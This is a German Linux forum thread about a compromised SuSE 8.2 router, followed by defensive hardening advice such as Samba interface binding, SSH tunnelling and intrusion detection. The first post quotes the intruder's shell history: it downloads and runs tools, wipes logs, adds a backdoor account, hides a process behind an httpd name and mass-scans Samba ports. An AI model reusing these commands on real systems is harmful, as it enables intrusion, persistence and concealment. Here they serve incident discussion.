hallo,

ich habe einen linuxrouter (SuSE 8.2) für mein netzwerk. gestern starte mein pc dann ohne besonderen grund neu und das laden aller dienste schlug komplett fehl. nun habe ich das system, auf einer anderen partition, neu installiert um zu sehen was da los war. nun habe ich im wurzelverzeichnis eine leere datei die "success" heißt -> HERZLICHEN GLÜCKWUNSCH...... in der history steht folgendes:

df -h
cd /tmp/.cfg
wget *.biz/tool/cleaner.tgz
tar -zxvf cleaner.tgz
w
rm -rf cleaner.tgz
cd cleaner
./rem root
w
ps ax
kill -9 12484
ps ax
cd ..
/usr/sbin/useradd valid
passwd valid
w
cd cleaner
./rem valid
ps ax
cd ..
wget http://*.net/~johan/wu-patch.tar.gz
tar -zxvf wu-patch.tar.gz
mv patch .font-unix
ls -al
cd patch
wget http://www.*.org/kik
chmod 755 kik
ls -al
./kik "/usr/sbin/httpd -f /etc/httpd/conf/" ./sexy
ps ax
exit
w
cd /tmp/.cfg
cd cleaner
./rem root
ps ax
cd ..
wget *.biz/tool/sambamass.tar.gz
tar -zxvf sambamass.tar.gz
rm -rf sambamass.tar.gz
cd samba
./serv 212.*.28.174
./scan 212 139 214 28
./scan 212 139 214 44
exit
logout

nun meine frage: ist es möglich auch ohne rootpasswort so etwas durchzuführen? eigentlich nicht, oder? und mein rootpasswort hielt ich für absolut unknackbar, da ich's ja eh nicht mehr verwende kann ichs ja auch sagen: rA5&&2Dd
so ein passwort kann man doch unmöglich knacken, oder? ich hoffe ihr könnte mir weiter helfen, da ich keine lust habe den rechner in 2 wochen wieder neu aufzusetzen. vielleicht sollte ich noch erwähnen, dass ich ein von mir modifiziertes firewallscript von harry.homelinux.org verwendet hatte!

Ich verschieb das mal..

sambamass.tar.gz
Klingt ganz nach einem Samba-Exploit. Hast du Samba auf dem Server betrieben?

Gruss, Andy

erstmal sorry für's "falschposten", ich dachte halt nur wegen router.... ja ich hatte samba auf dem router installiert. kann man über samba rootrechte auf dem system erlangen? danke schonmal für den tip, dannwerde ich wohl doch nach dem prinzip verfahren, nur das auf den router zu packen was da wirklich hingehört!

wie? samba offen om netz? nicht durch eine firewall geblockt? vielleicht auch noch bind und sendmail in der standartkonfig am netz???

sorry, aber wofür hast du 'ne firewall?

ähm samba auf einen router ???
also ich kann verstehen das man sparen will aber doch net so ... auf nem router gehört sich vielleicht auser den iptabels zum routen vielleicht noch n ftp mit wichtigen installs oder so das man die immer verfügbar hat aber samba is zuviel des guten ... sorry ... sollteste du trotzdem nicht darauf verzichten wollen speer die samba ports (nutzt des welche ach bestimmt ;=)) fürs inet ... iptabels ist dein freund bei sowas ;=)

jaja, ich weiß, seit mal nicht ganz so arg zu mir, ich hab doch schon genug schaden;) aber mal im ernst, ich habe eine iptables regel die samba über ppp0 speert, aber genau diese habe ich irgendwann mal aus der firewall genommen, weil ich von arbeit aus auf meine daten zugriff haben wollte und keine zeit mehr war einen ftp zu installieren/konfigurieren und irgendwie ist das kommentarzeichen dann halt im script geblieben... aber ist es eigentlich möglich sich über samba auf der konsole einzuloggen und dateien zu erstellen, die außerhalb der sambafreigabe liegen :confused:

Original geschrieben von NeuLinuxianer
jaja, ich weiß, seit mal nicht ganz so arg zu mir, ich hab doch schon genug schaden;) aber mal im ernst, ich habe eine iptables regel die samba über ppp0 speert, aber genau diese habe ich irgendwann mal aus der firewall genommen, weil ich von arbeit aus auf meine daten zugriff haben wollte und keine zeit mehr war einen ftp zu installieren/konfigurieren und irgendwie ist das kommentarzeichen dann halt im script geblieben... aber ist es eigentlich möglich sich über samba auf der konsole einzuloggen und dateien zu erstellen, die außerhalb der sambafreigabe liegen :confused: wenn der dein rootpasswort nicht rausfand (was man wohl schwer annehmen muss), muss dem so sein...

aber wie? wieso sollte so ein bug in samba sein?
gruss
pablo

Wäre denn nicht SSH was für Dich ?

Grüße
DaGrrr

Samba über eine Firewall-Regel zu sperren ist Mist. Um Samba an ein Interface zu binden gibt es die Option:


interface = eth0

in der smb.conf. Wenn du jetzt noch sicher gehen willst, dann kannst du zusätzlich eine Firewall-Regel definieren.

Wenn du auf den Rechner vom Internet her zugreifen willst, dann bieten sich einige Alternativen an:
Für gelegentliche Dateitransfers eigent sich SSH (SCP und entsprechende GUIs).
Wenn du öfters Zuhause zugreifen willst, dann wäre IPSec (FreeS/WAN) sehr konfortabel.
FTP geht grundsätzlich auch, allerdings musst du hier sehr vorsichtig sein, da FTP-Server bei Hacker sehr beliebt sind: Wehe du konfigurierst was falsch! Ausserdem würde ich dann FTP nur über SSH oder SSL getunnelt zulassen, da sonst dein Passwort im Klartext über die Leitung geht (Sniffen kann heute jeder).

Sei zum Schluss noch zu erwähnen, dass viele Dienste auf dem Router ein gewisses Risiko bergen. Allerdings hat nicht jeder zwei Kisten, so dass diese durchaus auch mit einem Sauber konfigurieren Router/Server auskommen.

Gruss, Andy

Oh.. hab vergessen, die Logfiles zu deleten... ;) :ugly:

Ne, aber bist selbst schuld... auf nem Router möglichst wenig daemons rennen lassen. Alles andere is zu Unsicher. Und wenn schon samba und son kram, dann doch bitte nach innen gesperrt...

Hi,
wie wär's denn mal mit nem Howto für eine sichere Sambakonfiguration? Würde mich auch mal interesieren welche Optionen man verwenden sollte wenn der Server am Internet hängt.

so wie ich das sehe führt er das mit dem samba* erst ganz zum schluß aus, als er schon fröhlich irgendwelche anderen sachen gedownloadet hat! ich könnte mich hauen dafür das ich dann aus lauter panik die partition formatiert habe ohne die /var/log/messages zu sichten...

was man bei einem router evtl. beachten sollte:

1. firewalling: das iptables script von harry ist hier die 1. wahl, wenn man das selber nicht besser kann!

2. jeden dienst der nicht von aussen erreichbar sein soll, auf lokale interfaces beschränken. z.B. bei samba durch folgende einträge in die smb.conf:


interfaces = 192.168.0.0/24
bind interfaces only = yes


bei dem ssh login gilt das gleiche. ausserdem würde ich noch root das direkte login per ssh verbieten...sshd_config:



ListenAddress 192.168.0.1
PermitRootLogin no


3. ein user der smb zugriff hat, die shell zugriffe entziehen.

4. tools wie z.B. snort (siehe unten) nutzen. wer's mag kann das dann noch mit tripwire abrunden.

5. god sex rootroot 12345 sind keine passwörter!

6. regelmässig sicherheitsupdates

dann ist es zwar immer noch nicht unmöglich einen rechner zu hacken, aber immerhin ein wenig schwieriger!

wenn du von der firma aus auf deine daten zugreifen möchtest, würde ich dir freeSwan an's herz legen.

Meinen Dank an NeuLinuxianer, dass er das überhaupt postet. Das führt einem wieder vor Augen, dass so etwas nicht nur theoretisch passieren kann, sondern gelegentlich auch tatsächlich vorkommt. Man weiss halt nie, wie gut ein Schutz ist, sondern stets nur wie schlecht er ist ...

mamue

@Windoofsklicker: danke für die vilen tipps!
@RapidMax: hast du vielleicht einen link für mich, wo steht wie man einen vsftp so einrichtet das er nur getunnelte verbindungen animmt?

und ein dankeschön an die allgemeinheit für das ganze feedback und die herzliche aufnahme ins forum :rolleyes:

Original geschrieben von NeuLinuxianer
@RapidMax: hast du vielleicht einen link für mich, wo steht wie man einen vsftp so einrichtet das er nur getunnelte verbindungen animmt?

vsftp kenne ich nicht. Für SSH musst du im wesentlichen den ftp-Server nur an den localhost binden.

Nun kannst du mit SSH den Port forwarden:

# ssh -L 2121:ftpserver:21 user@ftpserver

Nun kannst du mit einem ftp-client auf den FTP-Server über dein loop-back (localhost) zugreifen:

# ftp -P 2121 user@localhost

Du greifst also auf den lokalen Port 2121 zu. Hier kannst du irgend eine Nummer grösser als 1024 wählen. Kleinere Portnummern gelten als priviligiert und dürfen nur von root verwendet werden.

Gruss, Andy

wer könnte den maln paar möglichkeiten (verfahren) auflisten, um die sicherheit eines systems zu testen? bzw. nen link nennen wo angriffstechniken aufgelistet und beschrieben werden ... sicher machen kann man ja viel, aber ich finde es ist noch viel wichtiger nach dem "sicher machen" zu testen ob alles richtig konfiguriert ist bzw. ob der aufwand überhaupt lohnenswert war oder ob man mit einer falsch conf nur nochmehr lückengeöffnet hat .... schwachsinn wenn die türen zu sind, dafür aber die fenster angelweit auf.

nimm der einfach ne Knoppix CD und setz dich damit irgendwo an einen Internetzugang, dann startest du mal nessuss und überprüfst von außen deinen Router / Server.

Ich starte heute mittag meinen rechner (suse 8.2), will auf eine VFAT-Partition zugreifen und er sagt mir:
Laufwerk konnte nicht eingebunden werden. Die Fehlermeldung war:
mount: Falscher Dateisystemtyp, ungültige Optionen, der >>Superblock<< von /dev/hdc6 ist beschädigt oder es sind zu viele Dateisysteme eingehängt.

Ich starte also mit Knoppix, um rauszufinden worans liegt. An der Platte kann es nicht liegen, weil ich zuvor noch von windows aus drauf kam. (Danach übrigens auch). Im knoppix seh ich dann, dass in meinem wurzelverzeichnis auch so eine success datei liegt. Leider weiß ich nicht, wie ich an die history komme, die NeuLinuxianer gepostet hat. Habe aber auch keinen Samba laufen...

Bin für jede Hilfe äußerst dankbar!

Joy

in /root die .bash_history

danke windoofsklicker.
Da steht leider (?? leider? bin verdammt froh!) nur Zeugs drin was von mir stammt.

Leute, Leute wie schafft ihr es denn, dass eure Maschienen so schnell geknackt werden?
Welche Dienste waren am Laufen?
Wie wäre es mal mit einer Firewall?
Sind eure Passwörter in Wörterlisten zu finden?

Die success datei bei mir ist übrigens wieder weg, die war nur da als ich mit knoppix gebootet hatte. Hat die das knoppix vielleicht erzeugt? Wohl kaum, das ist ja grundsätzlich auf read-only eingestellt.
Die partitionen kann ich auch mounten wenn ichs von hand mache. Aber die von suse angelegten links zu den mounts gehen nach wie vor net.

naja... / ist ja nicht zwingend eine festplatte... gerade dann nicht, wenn man knoppix bootet ;)

Windoofsklicker:
Ich glaube eigentlich dass ich die in /mnt/hdc1 gesehen habe ... aber du hast mich gerade ganz unsicher gemacht :) ich schau nochmal nach.

Also die success datei war eben wieder in /dev/hdc4 (hdc4 ist meine linux root partition).
Sie war null bytes groß und wurde erzeugt während knoppix startet (hab ich am datum/zeit gesehen). Jetzt zurück im SuSE ist sie weg.

Das alles kommt mit höchst merkwürdig vor.

:confused: Joy